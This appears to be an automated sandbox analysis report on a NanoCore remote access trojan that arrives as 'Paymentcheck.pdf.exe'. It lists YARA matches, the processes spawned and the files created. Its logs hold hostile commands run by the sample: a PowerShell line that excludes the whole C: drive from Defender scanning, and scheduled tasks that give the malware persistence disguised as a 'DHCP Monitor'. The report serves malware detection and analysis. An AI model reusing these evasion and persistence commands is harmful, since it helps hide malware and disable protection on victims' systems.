Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Paymentcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: msbuildd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
Source: classification engineClassification label: mal100.troj.evad.winEXE@20/21@0/1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsssJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbsJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: Paymentcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile read: C:\Users\user\Desktop\Paymentcheck.pdf.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Paymentcheck.pdf.exe 'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
